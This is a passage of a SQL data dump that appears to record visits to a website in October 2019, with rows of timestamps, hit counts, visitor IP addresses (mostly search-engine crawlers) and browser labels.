0,0,'207.46.13.123','other'),(455322,1570927668,1,1,0,0,'66.249.64.69','chrome'),(455323,1570928144,9,9,0,0,'66.249.64.94','chrome'),(455324,1570928166,1,1,0,0,'66.249.64.66','chrome'),(455325,1570929240,1,1,0,0,'207.46.13.123','other'),(455326,1570929323,9,9,0,0,'66.249.64.94','chrome'),(455327,1570929643,1,1,0,0,'66.249.64.66','chrome'),(455328,1570929979,1,1,0,0,'66.249.64.69','chrome'),(455329,1570930486,1,1,0,0,'207.46.13.222','other'),(455330,1570930522,8,8,0,0,'66.249.64.94','chrome'),(455331,1570930649,1,1,0,0,'66.249.64.66','chrome'),(455332,1570931303,2,2,0,0,'66.249.64.69','chrome'),(455333,1570931733,9,9,0,0,'66.249.64.94','chrome'),(455334,1570932599,1,1,0,0,'193.106.30.99','chrome'),(455335,1570932933,2,0,2,0,'207.46.13.222',''),(455336,1570932934,8,8,0,0,'66.249.64.94','chrome'),(455337,1570933003,2,2,0,0,'66.249.64.69','chrome'),(455338,1570933092,1,1,0,0,'138.201.255.235','other'),(455339,1570934130,7,7,0,0,'66.249.64.94','chrome'),(455340,1570934205,1,1,0,0,'66.249.64.69','chrome'),(455341,1570934244,1,1,0,0,'207.46.13.222','other'),(455342,1570934929,1,1,0,0,'207.46.13.123','other'),(455343,1570935042,4,4,0,0,'66.249.64.66','chrome'),(455344,1570935327,9,9,0,0,'66.249.64.94','chrome'),(455345,1570936525,9,9,0,0,'66.249.64.94','chrome'),(455346,1570937194,1,1,0,0,'66.249.64.69','chrome'),(455347,1570937344,1,1,0,0,'8.29.198.26','other'),(455348,1570937357,1,1,0,0,'213.180.203.37','other'),(455349,1570937500,1,1,0,0,'213.180.203.44','other'),(455350,1570937733,9,9,0,0,'66.249.64.94','chrome'),(455351,1570937736,1,1,0,0,'8.29.198.27','other'),(455352,1570938139,2,2,0,0,'66.249.64.66','chrome'),(455353,1570938839,1,1,0,0,'157.55.39.184','other'),(455354,1570938914,1,1,0,0,'141.8.142.161','other'),(455355,1570938931,9,9,0,0,'66.249.64.94','chrome'),(455356,1570939619,1,1,0,0,'66.249.64.66','chrome'),(455357,1570940058,1,1,0,0,'138.201.255.235','other'),(455358,1570940096,1,1,0,0,'66.249.64.69','chrome'),(455359,1570940126,10,10,0,0,'66.249.64.94','chrome'),(455360,1570940204,1,1,0,0,'213.180.203.44','other'),(455361,1570941329,9,9,0,0,'66.249.64.94','chrome'),(455362,1570941957,1,1,0,0,'62.205.134.182','other'),(455363,1570942012,1,1,0,0,'66.249.64.66','chrome'),(455364,1570942546,9,9,0,0,'66.249.64.94','chrome'),(455365,1570942591,1,1,0,0,'66.249.64.69','chrome'),(455366,1570943196,1,1,0,0,'91.196.178.81','chrome'),(455367,1570943735,1,1,0,0,'66.249.79.172','chrome'),(455368,1570943737,9,9,0,0,'66.249.64.94','chrome'),(455369,1570944262,1,1,0,0,'141.8.142.119','other'),(455370,1570944645,1,1,0,0,'37.204.246.107','chrome'),(455371,1570944931,9,9,0,0,'66.249.64.94','chrome'),(455372,1570945613,1,1,0,0,'66.249.64.69','chrome'),(455373,1570945656,2,2,0,0,'207.46.13.14','other'),(455374,1570946109,1,1,0,0,'138.201.255.235','other'),(455375,1570946128,12,12,0,0,'66.249.64.94','chrome'),(455376,1570947343,9,9,0,0,'66.249.64.94','chrome'),(455377,1570947377,1,1,0,0,'66.249.64.69','chrome'),(455378,1570947711,1,1,0,0,'213.180.203.37','other'),(455379,1570948185,1,1,0,0,'8.29.198.27','other'),(455380,1570948219,1,1,0,0,'207.46.13.14','other'),(455381,1570948534,9,9,0,0,'66.249.64.94','chrome'),(455382,1570948564,1,1,0,0,'66.249.64.66','chrome'),(455383,1570948593,1,1,0,0,'8.29.198.25','other'),(455384,1570948877,1,1,0,0,'157.55.39.184','other'),(455385,1570949631,1,1,0,0,'207.46.13.222','other'),(455386,1570949729,8,8,0,0,'66.249.64.94','chrome'),(455387,1570949804,1,1,0,0,'66.249.64.69','chrome'),(455388,1570950020,1,1,0,0,'207.46.13.14','other'),(455389,1570950089,1,1,0,0,'38.99.62.94','other'),(455390,1570950362,1,1,0,0,'66.249.64.66','chrome'),(455391,1570950933,8,8,0,0,'66.249.64.94','chrome'),(455392,1570950997,1,1,0,0,'66.249.64.69','chrome'),(455393,1570951367,2,2,0,0,'207.46.13.14','other'),(455394,1570951568,1,1,0,0,'66.249.64.66','chrome'),(455395,1570951673,1,1,0,0,'138.201.255.235','other'),(455396,1570952131,9,9,0,0,'66.249.64.94','chrome'),(455397,1570952211,1,1,0,0,'66.249.64.69','chrome'),(455398,1570953287,2,2,0,0,'66.249.64.66','chrome'),(455399,1570953329,8,8,0,0,'66.249.64.94','chrome'),(455400,1570953412,1,1,0,0,'66.249.64.69','chrome'),(455401,1570954224,2,2,0,0,'207.46.13.14','other'),(455402,1570954531,9,9,0,0,'66.249.64.94','chrome'),(455403,1570954600,1,1,0,0,'66.249.64.66','chrome'),(455404,1570955727,5,4,1,0,'66.249.64.94',''),(455405,1570955813,1,1,0,0,'66.249.64.66','chrome'),(455406,1570957205,1,1,0,0,'138.201.255.235','other'),(455407,1570957351,8,8,0,0,'66.249.64.94','chrome'),(455408,1570957474,1,1,0,0,'66.249.64.69','chrome'),(455409,1570957927,2,2,0,0,'213.180.203.44','other'),(455410,1570958012,1,1,0,0,'213.180.203.37','other'),(455411,1570958040,1,1,0,0,'66.249.64.66','chrome'),(455412,1570958101,1,1,0,0,'141.8.142.2','other'),(455413,1570958462,9,9,0,0,'66.249.64.94','chrome'),(455414,1570958681,1,1,0,0,'66.249.64.69','chrome'),(455415,1570958860,1,1,0,0,'141.8.132.2','other'),(455416,1570959046,1,1,0,0,'8.29.198.25','other'),(455417,1570959252,2,2,0,0,'66.249.64.66','chrome'),(455418,1570959449,1,1,0,0,'8.29.198.26','other'),(455419,1570959819,8,8,0,0,'66.249.64.94','chrome'),(455420,1570960122,1,1,0,0,'207.46.13.14','other'),(455421,1570960508,1,1,0,0,'66.249.64.66','chrome'),(455422,1570961089,8,8,0,0,'66.249.64.94','chrome'),(455423,1570961195,2,2,0,0,'66.249.64.69','chrome'),(455424,1570961273,1,1,0,0,'157.55.39.184','other'),(455425,1570962085,1,1,0,0,'91.196.178.87','other'),(455426,1570962318,1,1,0,0,'66.249.64.66','chrome'),(455427,1570962395,1,1,0,0,'58.250.125.135','other'),(455428,1570962442,1,1,0,0,'138.201.255.235','other'),(455429,1570962509,9,9,0,0,'66.249.64.94','chrome'),(455430,1570963310,1,1,0,0,'66.249.64.69','chrome'),(455431,1570963825,10,10,0,0,'66.249.64.94','chrome'),(455432,1570963926,1,1,0,0,'46.211.154.136','chrome'),(455433,1570964170,1,1,0,0,'157.55.39.184','other'),(455434,1570965032,9,9,0,0,'66.249.64.94','chrome'),(455435,1570965558,1,1,0,0,'157.55.39.184','other'),(455436,1570965692,1,1,0,0,'66.249.64.69','chrome'),(455437,1570965740,1,1,0,0,'46.211.154.136','chrome'),(455438,1570966150,1,1,0,0,'46.133.103.187','chrome'),(455439,1570966316,7,7,0,0,'66.249.64.94','chrome'),(455440,1570966949,1,1,0,0,'207.46.13.195','other'),(455441,1570966953,2,2,0,0,'66.249.64.66','chrome'),(455442,1570967073,1,1,0,0,'66.249.64.69','chrome'),(455443,1570967148,1,1,0,0,'109.74.154.72','chrome'),(455444,1570967508,1,1,0,0,'138.201.255.235','other'),(455445,1570967637,10,10,0,0,'66.249.64.94','chrome'),(455446,1570968785,9,9,0,0,'66.249.64.94','chrome'),(455447,1570968834,1,1,0,0,'91.196.178.180','chrome'),(455448,1570968848,1,1,0,0,'66.249.64.66','chrome'),(455449,1570968984,1,1,0,0,'66.249.64.69','chrome'),(455450,1570969463,1,1,0,0,'213.180.203.44','other'),(455451,1570969490,1,1,0,0,'207.46.13.60','other'),(455452,1570969900,1,1,0,0,'8.29.198.25','other'),(455453,1570969987,9,9,0,0,'66.249.64.94','chrome'),(455454,1570970301,1,1,0,0,'8.29.198.26','other'),(455455,1570970739,2,2,0,0,'66.249.64.69','chrome'),(455456,1570971064,1,1,0,0,'207.46.13.141','other'),(455457,1570971251,8,8,0,0,'66.249.64.94','chrome'),(455458,1570971323,1,1,0,0,'157.55.39.145','other'),(455459,1570971938,5,5,0,0,'66.249.64.66','chrome'),(455460,1570971977,2,2,0,0,'66.249.64.69','chrome'),(455461,1570972045,1,1,0,0,'138.201.255.235','other'),(455462,1570972469,5,5,0,0,'66.249.64.94','chrome'),(455463,1570973137,1,1,0,0,'66.249.64.66','chrome'),(455464,1570973367,1,1,0,0,'207.46.13.141','other'),(455465,1570973664,9,9,0,0,'66.249.64.94','chrome'),(455466,1570973803,1,1,0,0,'138.246.253.5','chrome'),(455467,1570973935,1,1,0,0,'213.180.203.44','other'),(455468,1570974301,2,2,0,0,'66.249.64.69','chrome'),(455469,1570974946,9,9,0,0,'66.249.64.94','chrome'),(455470,1570974976,1,1,0,0,'207.46.13.141','other'),(455471,1570975600,1,1,0,0,'138.246.253.5','chrome'),(455472,1570976233,1,1,0,0,'66.249.64.66','chrome'),(455473,1570976238,5,5,0,0,'66.249.64.94','chrome'),(455474,1570976298,1,1,0,0,'138.201.255.235','other'),(455475,1570976463,1,1,0,0,'207.46.13.125','other'),(455476,1570976774,7,7,0,0,'66.249.64.69','chrome'),(455477,1570977378,6,6,0,0,'66.249.64.94','chrome'),(455478,1570977658,2,2,0,0,'207.46.13.141','other'),(455479,1570977964,2,2,0,0,'66.249.64.66','chrome'),(455480,1570978232,1,1,0,0,'178.150.134.163','firefox'),(455481,1570978548,9,9,0,0,'66.249.64.94','chrome'),(455482,1570979221,2,2,0,0,'66.249.64.69','chrome'),(455483,1570979739,6,6,0,0,'66.249.64.94','chrome'),(455484,1570980344,1,1,0,0,'207.46.13.125','other'),(455485,1570980397,1,1,0,0,'66.249.64.69','chrome'),(455486,1570980400,3,3,0,0,'66.249.64.66','chrome'),(455487,1570980560,1,1,0,0,'138.201.255.235','other'),(455488,1570980756,1,1,0,0,'8.29.198.25','other'),(455489,1570980952,9,9,0,0,'66.249.64.94','chrome'),(455490,1570981146,1,1,0,0,'8.29.198.27','other'),(455491,1570981963,1,1,0,0,'173.206.21.218','firefox'),(455492,1570982152,8,8,0,0,'66.249.64.94','chrome'),(455493,1570982153,1,1,0,0,'66.249.65.132','chrome'),(455494,1570982179,1,1,0,0,'66.249.64.69','chrome'),(455495,1570982523,1,1,0,0,'207.46.13.125','other'),(455496,1570983351,10,10,0,0,'66.249.64.94','chrome'),(455497,1570983924,1,1,0,0,'213.180.203.37','other'),(455498,1570983928,1,1,0,0,'141.8.142.2','other'),(455499,1570984520,1,1,0,0,'207.46.13.125','other'),(455500,1570984550,9,9,0,0,'66.249.64.94','chrome'),(455501,1570984640,1,1,0,0,'66.249.64.66','chrome'),(455502,1570984726,1,1,0,0,'138.201.255.235','other'),(455503,1570985766,7,7,0,0,'66.249.64.66','chrome'),(455504,1570985790,2,2,0,0,'66.249.64.94','chrome'),(455505,1570986081,2,2,0,0,'66.249.64.69','chrome'),(455506,1570986330,1,1,0,0,'91.196.178.78','firefox'),(455507,1570986461,1,1,0,0,'5.45.207.49','other'),(455508,1570986492,1,1,0,0,'213.159.213.137','chrome'),(455509,1570986767,4,4,0,0,'66.249.64.66','chrome'),(455510,1570987029,1,1,0,0,'157.55.39.82','other'),(455511,1570987140,2,2,0,0,'66.249.64.69','chrome'),(455512,1570987146,4,4,0,0,'66.249.64.94','chrome'),(455513,1570987980,1,1,0,0,'66.249.64.66','chrome'),(455514,1570988276,1,1,0,0,'193.106.30.99','chrome'),(455515,1570988374,1,1,0,0,'207.46.13.141','other'),(455516,1570988745,1,1,0,0,'138.201.255.235','other'),(455517,1570988947,7,7,0,0,'66.249.64.94','chrome'),(455518,1570989026,3,3,0,0,'66.249.64.66','chrome'),(455519,1570989322,1,1,0,0,'66.249.64.69','chrome'),(455520,1570989840,1,1,0,0,'141.8.183.15','other'),(455521,1570989852,11,11,0,0,'66.249.64.94','chrome'),(455522,1570989994,3,3,0,0,'66.249.64.66','chrome'),(455523,1570990190,2,2,0,0,'66.249.64.16','chrome'),(455524,1570990632,2,0,2,0,'157.55.39.82',''),(455525,1570991004,9,9,0,0,'66.249.64.94','chrome'),(455526,1570991236,3,3,0,0,'66.249.64.69','chrome'),(455527,1570991626,1,1,0,0,'8.29.198.27','other'),(455528,1570991687,1,1,0,0,'213.180.203.44','other'),(455529,1570991798,1,1,0,0,'66.249.64.66','chrome'),(455530,1570992000,1,1,0,0,'8.29.198.26','other'),(455531,1570992268,1,1,0,0,'213.159.38.90','chrome'),(455532,1570992350,11,11,0,0,'66.249.64.94','chrome'),(455533,1570992353,2,2,0,0,'66.249.64.18','chrome'),(455534,1570992667,1,1,0,0,'138.201.255.235','other'),(455535,1570992947,1,1,0,0,'207.46.13.63','other'),(455536,1570993033,1,1,0,0,'66.249.64.69','chrome'),(455537,1570993166,2,2,0,0,'66.249.64.66','chrome'),(455538,1570993548,8,8,0,0,'66.249.64.94','chrome'),(455539,1570994211,3,3,0,0,'66.249.64.66','chrome'),(455540,1570994762,8,8,0,0,'66.249.64.94','chrome'),(455541,1570995201,2,2,0,0,'66.249.64.66','chrome'),(455542,1570995692,1,1,0,0,'213.180.203.37','other'),(455543,1570995947,9,9,0,0,'66.249.64.94','chrome'),(455544,1570996629,2,2,0,0,'66.249.64.66','chrome'),(455545,1570996718,1,1,0,0,'138.201.255.235','other'),(455546,1570996842,2,2,0,0,'66.249.64.18','chrome'),(455547,1570996945,2,2,0,0,'157.55.39.82','other'),(455548,1570997151,8,8,0,0,'66.249.64.94','chrome'),(455549,1570997161,1,1,0,0,'66.249.64.69','chrome'),(455550,1570997306,1,1,0,0,'141.8.142.2','other'),(455551,1570997775,1,1,0,0,'52.162.161.148','other'),(455552,1570997834,4,4,0,0,'66.249.64.66','chrome'),(455553,1570997909,1,1,0,0,'207.46.13.63','other'),(455554,1570998347,10,10,0,0,'66.249.64.94','chrome'),(455555,1570998814,1,1,0,0,'157.55.39.82','other'),(455556,1570999025,3,3,0,0,'66.249.64.69','chrome'),(455557,1570999335,9,9,0,0,'66.249.64.94','chrome'),(455558,1570999575,2,2,0,0,'66.249.64.66','chrome'),(455559,1570999997,1,1,0,0,'66.249.64.16','chrome'),(455560,1571000310,7,7,0,0,'66.249.64.94','chrome'),(455561,1571000440,1,1,0,0,'66.249.64.69','chrome'),(455562,1571000484,1,1,0,0,'138.201.255.235','other'),(455563,1571000728,1,1,0,0,'213.180.203.44','other'),(455564,1571000821,3,3,0,0,'66.249.64.66','chrome'),(455565,1571001422,5,5,0,0,'66.249.64.94','chrome'),(455566,1571001516,3,3,0,0,'66.249.64.69','chrome'),(455567,1571001660,1,1,0,0,'13.66.139.0','other'),(455568,1571002022,5,4,1,0,'66.249.64.66',''),(455569,1571002459,2,2,0,0,'66.249.64.69','chrome'),(455570,1571002475,12,12,0,0,'66.249.64.94','chrome'),(455571,1571002479,1,1,0,0,'8.29.198.27','other'),(455572,1571002532,2,2,0,0,'213.180.203.37','other'),(455573,1571002764,1,0,1,0,'66.249.64.18',''),(455574,1571002846,1,1,0,0,'8.29.198.25','other'),(455575,1571003842,10,10,0,0,'66.249.64.94','chrome'),(455576,1571003959,2,2,0,0,'66.249.64.69','chrome'),(455577,1571004069,3,3,0,0,'66.249.64.66','chrome'),(455578,1571004281,1,1,0,0,'66.249.64.16','chrome'),(455579,1571004307,1,1,0,0,'138.201.255.235','other'),(455580,1571004371,1,1,0,0,'213.180.203.44','other'),(455581,1571005030,7,7,0,0,'66.249.64.94','chrome'),(455582,1571005236,1,1,0,0,'13.66.139.0','other'),(455583,1571005369,5,5,0,0,'66.249.64.66','chrome'),(455584,1571006245,8,8,0,0,'66.249.64.94','chrome'),(455585,1571006431,2,2,0,0,'66.249.64.66','chrome'),(455586,1571007547,2,2,0,0,'157.55.39.220','other'),(455587,1571007623,14,14,0,0,'66.249.64.94','chrome'),(455588,1571007730,3,3,0,0,'66.249.64.69','chrome'),(455589,1571007793,8,8,0,0,'66.249.64.66','chrome'),(455590,1571007984,1,1,0,0,'138.201.255.235','other'),(455591,1571008031,1,1,0,0,'207.46.13.63','other'),(455592,1571008180,1,1,0,0,'213.180.203.44','other'),(455593,1571008598,9,9,0,0,'66.249.64.94','chrome'),(455594,1571008698,3,3,0,0,'66.249.64.66','chrome'),(455595,1571009277,1,1,0,0,'104.243.246.182','chrome'),(455596,1571009513,8,8,0,0,'66.249.64.94','chrome'),(455597,1571009626,1,1,0,0,'207.46.13.63','other'),(455598,1571009651,3,3,0,0,'66.249.64.66','chrome'),(455599,1571009838,1,1,0,0,'66.249.64.16','chrome'),(455600,1571010042,1,1,0,0,'207.46.13.189','other'),(455601,1571010449,7,7,0,0,'66.249.64.94','chrome'),(455602,1571010629,3,3,0,0,'66.249.64.69','chrome'),(455603,1571010913,1,1,0,0,'62.205.134.182','other'),(455604,1571011083,2,2,0,0,'66.249.64.66','chrome'),(455605,1571011425,1,1,0,0,'66.249.64.18','chrome'),(455606,1571011693,1,1,0,0,'66.249.64.16','chrome'),(455607,1571011801,11,11,0,0,'66.249.64.94','chrome'),(455608,1571011927,1,1,0,0,'213.180.203.37','other'),(455609,1571012148,7,7,0,0,'66.249.64.66','chrome'),(455610,1571012290,3,3,0,0,'66.249.64.69','chrome'),(455611,1571012485,1,1,0,0,'213.180.203.44','other'),(455612,1571012930,7,7,0,0,'66.249.64.94','chrome'),(455613,1571013064,1,1,0,0,'207.46.13.63','other'),(455614,1571013336,1,1,0,0,'8.29.198.26','other'),(455615,1571013703,1,1,0,0,'8.29.198.27','other'),(455616,1571013821,1,1,0,0,'66.249.64.16','chrome'),(455617,1571013868,1,1,0,0,'66.249.64.18','chrome'),(455618,1571014048,8,8,0,0,'66.249.64.94','chrome'),(455619,1571014252,1,1,0,0,'5.62.18.105','chrome'),(455620,1571014668,1,1,0,0,'157.55.39.220','other'),(455621,1571014706,8,8,0,0,'66.249.64.66','chrome'),(455622,1571014951,1,1,0,0,'213.180.203.37','other'),(455623,1571015260,8,8,0,0,'66.249.64.94','chrome'),(455624,1571015816,2,2,0,0,'207.46.13.63','other'),(455625,1571015994,1,1,0,0,'66.249.64.66','chrome'),(455626,1571016028,1,1,0,0,'87.250.224.90','other'),(455627,1571016223,11,11,0,0,'66.249.64.94','chrome'),(455628,1571016788,2,2,0,0,'66.249.64.69','chrome'),(455629,1571016839,1,1,0,0,'66.249.64.16','chrome'),(455630,1571016934,1,1,0,0,'178.74.214.94','chrome'),(455631,1571017013,1,1,0,0,'66.249.64.66','chrome'),(455632,1571017183,6,6,0,0,'66.249.64.94','chrome'),(455633,1571018029,2,2,0,0,'157.55.39.220','other'),(455634,1571018248,7,7,0,0,'66.249.64.94','chrome'),(455635,1571018350,1,1,0,0,'66.249.64.66','chrome'),(455636,1571018456,1,1,0,0,'94.178.6.121','chrome'),(455637,1571018652,4,4,0,0,'66.249.64.69','chrome'),(455638,1571018865,1,1,0,0,'213.180.203.37','other'),(455639,1571019445,10,10,0,0,'66.249.64.94','chrome'),(455640,1571019931,2,2,0,0,'66.249.64.16','chrome'),(455641,1571020546,6,6,0,0,'66.249.64.66','chrome'),(455642,1571020610,15,15,0,0,'66.249.64.94','chrome'),(455643,1571020957,1,1,0,0,'66.249.64.18','chrome'),(455644,1571021162,1,1,0,0,'66.249.64.16','chrome'),(455645,1571021840,5,5,0,0,'66.249.64.66','chrome'),(455646,1571021855,7,7,0,0,'66.249.64.94','chrome'),(455647,1571022219,2,2,0,0,'66.249.64.16','chrome'),(455648,1571022787,9,9,0,0,'66.249.64.94','chrome'),(455649,1571023093,1,1,0,0,'66.249.64.69','chrome'),(455650,1571023141,2,2,0,0,'66.249.64.66','chrome'),(455651,1571023781,1,1,0,0,'66.249.64.16','chrome'),(455652,1571024205,2,2,0,0,'8.29.198.27','other'),(455653,1571024223,2,2,0,0,'66.249.64.69','chrome'),(455654,1571024252,11,11,0,0,'66.249.64.94','chrome'),(455655,1571024319,4,4,0,0,'66.249.64.66','chrome'),(455656,1571025028,1,1,0,0,'157.55.39.220','other'),(455657,1571025175,1,1,0,0,'213.180.203.44','other'),(455658,1571025445,11,11,0,0,'66.249.64.94','chrome'),(455659,1571025598,3,3,0,0,'66.249.64.66','chrome'),(455660,1571025657,1,1,0,0,'66.249.64.16','chrome'),(455661,1571026157,3,3,0,0,'66.249.64.69','chrome'),(455662,1571026495,8,8,0,0,'66.249.64.94','chrome'),(455663,1571026650,3,3,0,0,'66.249.64.66','chrome'),(455664,1571026856,1,1,0,0,'66.249.64.18','chrome'),(455665,1571027391,1,1,0,0,'87.250.224.90','other'),(455666,1571027879,1,1,0,0,'66.249.65.132','chrome'),(455667,1571027880,9,9,0,0,'66.249.64.94','chrome'),(455668,1571028346,1,1,0,0,'178.93.58.184','other'),(455669,1571028469,1,1,0,0,'157.55.39.198','other'),(455670,1571028491,4,4,0,0,'66.249.64.69','chrome'),(455671,1571028494,1,1,0,0,'62.205.134.182','other'),(455672,1571028525,1,1,0,0,'157.55.39.208','other'),(455673,1571028996,1,1,0,0,'46.211.6.227','chrome'),(455674,1571028997,1,1,0,0,'66.249.83.199','chrome'),(455675,1571029059,8,8,0,0,'66.249.64.94','chrome'),(455676,1571029700,2,2,0,0,'66.249.64.66','chrome'),(455677,1571029804,1,1,0,0,'66.249.64.16','chrome'),(455678,1571030245,10,10,0,0,'66.249.64.94','chrome'),(455679,1571030753,3,3,0,0,'66.249.64.69','chrome'),(455680,1571031260,1,1,0,0,'66.249.64.16','chrome'),(455681,1571031460,9,9,0,0,'66.249.64.94','chrome'),(455682,1571031639,2,2,0,0,'66.249.64.66','chrome'),(455683,1571031969,1,1,0,0,'157.55.39.208','other'),(455684,1571032652,10,10,0,0,'66.249.64.94','chrome'),(455685,1571033137,1,1,0,0,'66.249.64.69','chrome'),(455686,1571033582,1,1,0,0,'46.211.147.88','chrome'),(455687,1571033850,9,9,0,0,'66.249.64.94','chrome'),(455688,1571033980,2,2,0,0,'66.249.64.66','chrome'),(455689,1571034166,1,1,0,0,'91.196.178.129','firefox'),(455690,1571034384,1,1,0,0,'213.180.203.44','other'),(455691,1571035055,1,1,0,0,'8.29.198.26','other'),(455692,1571035060,9,9,0,0,'66.249.64.94','chrome'),(455693,1571035372,1,1,0,0,'8.29.198.25','other'),(455694,1571035749,1,1,0,0,'66.249.64.69','chrome'),(455695,1571036239,9,9,0,0,'66.249.64.94','chrome'),(455696,1571036901,1,1,0,0,'66.249.64.66','chrome'),(455697,1571037271,8,8,0,0,'66.249.64.94','chrome'),(455698,1571037450,1,1,0,0,'66.249.69.126','chrome'),(455699,1571037500,2,2,0,0,'66.249.64.69','chrome'),(455700,1571037610,1,1,0,0,'157.55.39.199','other'),(455701,1571037839,1,1,0,0,'66.249.64.66','chrome'),(455702,1571038659,12,12,0,0,'66.249.64.94','chrome'),(455703,1571038795,1,1,0,0,'91.196.178.87','other'),(455704,1571039828,4,4,0,0,'66.249.64.66','chrome'),(455705,1571039852,1,1,0,0,'213.180.203.44','other'),(455706,1571039872,7,7,0,0,'66.249.64.94','chrome'),(455707,1571039936,2,2,0,0,'157.55.39.199','other'),(455708,1571039974,3,3,0,0,'66.249.64.69','chrome'),(455709,1571040796,12,12,0,0,'66.249.64.94','chrome'),(455710,1571041086,2,2,0,0,'66.249.64.66','chrome'),(455711,1571041801,2,1,1,0,'66.249.64.69',''),(455712,1571042090,1,0,1,0,'66.249.64.66',''),(455713,1571042253,11,11,0,0,'66.249.64.94','chrome'),(455714,1571042298,3,3,0,0,'66.249.64.66','chrome'),(455715,1571043467,11,11,0,0,'66.249.64.94','chrome'),(455716,1571043541,2,2,0,0,'66.249.64.16','chrome'),(455717,1571043558,2,2,0,0,'66.249.64.69','chrome'),(455718,1571043602,1,1,0,0,'213.180.203.37','other'),(455719,1571043732,1,1,0,0,'35.187.132.1','chrome'),(455720,1571044024,2,2,0,0,'66.249.64.18','chrome'),(455721,1571044135,3,3,0,0,'66.249.64.66','chrome'),(455722,1571044662,10,10,0,0,'66.249.64.94','chrome'),(455723,1571044823,1,1,0,0,'66.249.64.16','chrome'),(455724,1571045281,2,2,0,0,'66.249.64.66','chrome'),(455725,1571045282,2,2,0,0,'66.249.64.69','chrome'),(455726,1571045431,2,2,0,0,'66.249.64.18','chrome'),(455727,1571045743,1,1,0,0,'128.71.5.184','chrome'),(455728,1571045859,7,7,0,0,'66.249.64.94','chrome'),(455729,1571045925,1,1,0,0,'8.29.198.26','other'),(455730,1571046205,1,1,0,0,'8.29.198.25','other'),(455731,1571046494,2,2,0,0,'66.249.64.69','chrome'),(455732,1571046496,5,5,0,0,'66.249.64.66','chrome'),(455733,1571046570,2,2,0,0,'66.249.64.16','chrome'),(455734,1571047066,12,12,0,0,'66.249.64.94','chrome'),(455735,1571047229,1,1,0,0,'91.196.178.184','chrome'),(455736,1571047590,2,2,0,0,'66.249.64.69','chrome'),(455737,1571047679,1,1,0,0,'66.249.64.18','chrome'),(455738,1571047690,3,3,0,0,'66.249.64.66','chrome'),(455739,1571047890,1,1,0,0,'157.55.39.102','other'),(455740,1571048260,10,10,0,0,'66.249.64.94','chrome'),(455741,1571048356,1,1,0,0,'66.249.64.16','chrome'),(455742,1571048882,2,2,0,0,'66.249.64.66','chrome'),(455743,1571048943,2,2,0,0,'66.249.64.18','chrome'),(455744,1571049051,3,3,0,0,'66.249.64.69','chrome'),(455745,1571049465,17,17,0,0,'66.249.64.94','chrome'),(455746,1571049714,1,1,0,0,'178.133.242.243','chrome'),(455747,1571049853,3,3,0,0,'66.249.64.66','chrome'),(455748,1571049941,1,1,0,0,'66.249.64.18','chrome'),(455749,1571050170,2,2,0,0,'66.249.64.16','chrome'),(455750,1571050682,1,1,0,0,'66.249.64.69','chrome'),(455751,1571050692,10,10,0,0,'66.249.64.94','chrome'),(455752,1571051291,5,5,0,0,'66.249.64.66','chrome'),(455753,1571051304,2,2,0,0,'66.249.64.18','chrome'),(455754,1571051577,1,1,0,0,'213.180.203.44','other'),(455755,1571051708,1,1,0,0,'66.249.64.69','chrome'),(455756,1571051859,7,7,0,0,'66.249.64.94','chrome'),(455757,1571052592,1,1,0,0,'207.46.13.2','other'),(455758,1571052970,2,2,0,0,'66.249.64.66','chrome'),(455759,1571053009,5,5,0,0,'66.249.64.94','chrome'),(455760,1571053016,1,1,0,0,'213.180.203.37','other'),(455761,1571053270,2,2,0,0,'66.249.64.69','chrome'),(455762,1571054011,2,2,0,0,'66.249.64.16','chrome'),(455763,1571054169,6,6,0,0,'66.249.64.66','chrome'),(455764,1571054271,6,6,0,0,'66.249.64.94','chrome'),(455765,1571054380,1,1,0,0,'157.55.39.218','other'),(455766,1571054441,1,1,0,0,'91.124.118.183','firefox'),(455767,1571054458,1,1,0,0,'46.211.154.97','chrome'),(455768,1571055225,3,3,0,0,'66.249.64.69','chrome'),(455769,1571055383,1,1,0,0,'157.55.39.218','other'),(455770,1571055384,1,1,0,0,'109.74.154.72','chrome'),(455771,1571055463,10,10,0,0,'66.249.64.94','chrome'),(455772,1571056102,1,1,0,0,'66.249.64.16','chrome'),(455773,1571056668,12,12,0,0,'66.249.64.94','chrome'),(455774,1571056737,1,1,0,0,'37.73.219.20','chrome'),(455775,1571056748,1,1,0,0,'66.249.64.18','chrome'),(455776,1571056759,1,1,0,0,'66.249.64.66','chrome'),(455777,1571056762,1,1,0,0,'46.211.215.23','chrome'),(455778,1571056822,1,1,0,0,'8.29.198.27','other'),(455779,1571057054,1,1,0,0,'8.29.198.26','other'),(455780,1571057873,9,9,0,0,'66.249.64.94','chrome'),(455781,1571057878,1,1,0,0,'66.249.64.18','chrome'),(455782,1571057984,1,1,0,0,'157.55.39.102','other'),(455783,1571058020,3,3,0,0,'66.249.64.66','chrome'),(455784,1571058035,1,1,0,0,'66.249.64.16','chrome'),(455785,1571058132,1,1,0,0,'46.201.175.3','chrome'),(455786,1571058198,1,1,0,0,'92.112.124.123','chrome'),(455787,1571058313,1,1,0,0,'46.211.154.127','chrome'),(455788,1571058981,2,2,0,0,'66.249.64.66','chrome'),(455789,1571059057,8,8,0,0,'66.249.64.94','chrome'),(455790,1571059250,1,1,0,0,'128.78.109.155','chrome'),(455791,1571059356,5,5,0,0,'66.249.64.69','chrome'),(455792,1571060270,9,9,0,0,'66.249.64.94','chrome'),(455793,1571060337,2,2,0,0,'66.249.64.16','chrome'),(455794,1571060359,3,3,0,0,'66.249.64.69','chrome'),(455795,1571060909,1,1,0,0,'66.249.64.18','chrome'),(455796,1571060968,3,3,0,0,'66.249.64.66','chrome'),(455797,1571061103,1,1,0,0,'213.180.203.44','other'),(455798,1571061466,10,10,0,0,'66.249.64.94','chrome'),(455799,1571062231,3,3,0,0,'66.249.64.66','chrome'),(455800,1571062389,7,7,0,0,'66.249.64.94','chrome'),(455801,1571062681,1,1,0,0,'66.249.64.69','chrome'),(455802,1571062701,1,1,0,0,'157.55.39.218','other'),(455803,1571062770,1,1,0,0,'157.55.39.248','other'),(455804,1571063082,1,1,0,0,'157.55.39.102','other'),(455805,1571063671,4,4,0,0,'66.249.64.69','chrome'),(455806,1571063673,2,2,0,0,'66.249.64.66','chrome'),(455807,1571063676,14,14,0,0,'66.249.64.94','chrome'),(455808,1571063750,3,3,0,0,'66.249.64.16','chrome'),(455809,1571063792,1,1,0,0,'37.73.173.195','chrome'),(455810,1571063804,1,1,0,0,'157.55.39.218','other'),(455811,1571064251,1,1,0,0,'37.73.147.211','chrome'),(455812,1571064781,4,4,0,0,'66.249.64.69','chrome'),(455813,1571065086,9,9,0,0,'66.249.64.94','chrome'),(455814,1571065090,4,4,0,0,'66.249.64.66','chrome'),(455815,1571065166